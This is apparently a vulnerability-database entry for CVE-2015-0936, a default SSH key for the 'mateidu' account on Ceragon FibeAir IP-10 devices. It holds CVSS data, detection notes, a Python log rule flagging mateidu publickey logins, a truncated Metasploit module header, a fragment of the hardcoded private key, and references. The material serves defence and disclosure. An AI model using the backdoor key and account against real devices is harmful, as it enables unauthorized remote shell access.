CVE-2015-0936
Published: 2017-06-01
Priority: P180, critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 78.09% (99.5th percentile)
Ceragon FibeAir IP-10 devices have a default SSH public key in the authorized_keys file for the mateidu user, which allows remote attackers to obtain SSH access by leveraging knowledge of the private key.
Detection & IOCs (extracted from sources)
- Detect SSH authentication attempts to Ceragon FibeAir IP-10 devices using the 'mateidu' username; any successful login with this account using publickey auth should be treated as exploitation of CVE-2015-0936.
- The exploit authenticates exclusively via SSH public key (no password). Alert on publickey-method SSH logins for the 'mateidu' user on port 22.
- Post-authentication, the exploit immediately spawns /bin/sh over the SSH channel. Monitor for interactive shell sessions spawned directly from SSH daemon processes under the mateidu account.
- The hardcoded RSA private key (MIICWwIBAAKBgQDBEh0OUdoiplc0P+...) is embedded in the Metasploit module and public exploits. Fingerprint the public key counterpart in authorized_keys files on SSH servers to identify vulnerable or compromised Ceragon devices.
- The default SSH_TIMEOUT for the Metasploit exploit module is 30 seconds; network-level detection rules should account for slow or delayed SSH negotiation that may still represent exploitation attempts.
- The exploit supports proxy chaining (datastore['Proxies']), meaning the true attacker source IP may be obscured. IP-based blocking alone is insufficient.
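The first two detection notes above, as an added example (not from the page or from the Metasploit module): a log rule that flags SSH authentication events for the mateidu account and rates an accepted publickey login as critical. It assumes OpenSSH-style syslog lines; the host name, PIDs and addresses in the sample are constructed.

```python
import re

# OpenSSH-style sshd auth messages (assumed format; the device's own log
# layout is not given on the page).
AUTH_RE = re.compile(
    r"sshd\[(?P<pid>\d+)\]: (?P<result>Accepted|Failed) (?P<method>\S+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+)"
)
TARGET_USER = "mateidu"  # account named in CVE-2015-0936


def classify(line):
    """Return an alert dict for a mateidu auth event, else None."""
    m = AUTH_RE.search(line)
    if not m or m["user"] != TARGET_USER:
        return None
    exploited = m["result"] == "Accepted" and m["method"] == "publickey"
    return {
        "severity": "critical" if exploited else "warning",
        "result": m["result"],
        "method": m["method"],
        # Source is recorded for triage only: it may be a proxy, so the
        # rule never filters or allow-lists on it.
        "src": m["src"],
        "pid": int(m["pid"]),
    }


def scan(lines):
    """Classify every line and keep only the alerts."""
    return [a for a in map(classify, lines) if a]


# Constructed sample log lines (documentation address ranges).
SAMPLE = [
    "Apr  2 10:01:07 ip10 sshd[411]: Failed password for mateidu from 198.51.100.7 port 40112 ssh2",
    "Apr  2 10:01:09 ip10 sshd[415]: Accepted publickey for mateidu from 203.0.113.25 port 40150 ssh2",
    "Apr  2 10:03:30 ip10 sshd[420]: Accepted password for admin from 192.0.2.10 port 51515 ssh2",
    "Apr  2 10:04:02 ip10 sshd[431]: Failed publickey for invalid user mateidu from 203.0.113.25 port 40188 ssh2",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

Failed or password-based attempts for the same account are kept as warnings because they show the account is being probed even when the login does not succeed.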
CVSS provenance
- nvd, v3.1: 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- nvd, v2.0: 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
No detection rules found.
Exploit-DB
Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)
exploitdb·2015-04-01
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
  'Description' => %q{
    Ceragon ships a public/private key pair on FibeAir IP-10 devices
    that allows passwordless authentication to any other IP-10 device.
    Since the key is easily retrievable, an attacker can use it to
    gain unauthorized remote access as the "mateidu" user.
  },
  'Platform' => 'unix',
  'Arch' => ARCH_CMD,
  'Privileged' => false,
  'Targets' => [ [ "Universal", {} ] ],
  'Payload' =>
    {
      'Compat' => {
        'PayloadType' => 'cmd_interact',
        'ConnectionType' => 'find',
      },
    },
'Author' =
Metasploit
Ceragon FibeAir IP-10 SSH Private Key Exposure
metasploit
Ceragon ships a public/private key pair on FibeAir IP-10 devices that allows passwordless authentication to any other IP-10 device. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as the "mateidu" user.
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/131259/Ceragon-FibeAir-IP-10-SSH-Private-Key-Exposure.html
- http://packetstormsecurity.com/files/131260/Ceragon-FibeAir-IP-10-SSH-Private-Key-Exposure.html
- http://seclists.org/fulldisclosure/2015/Apr/3
- http://www.securityfocus.com/bid/73696
- https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15
- https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwjs47SGp47UAhVF5iYKHYGLDQkQFggoMAE&url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fssh%2Fceragon_fibeair_known_privkey&usg=AFQjCNFZiZcWj47cpqPX-AbfpsW0DL4yYw
Published: 2017-06-01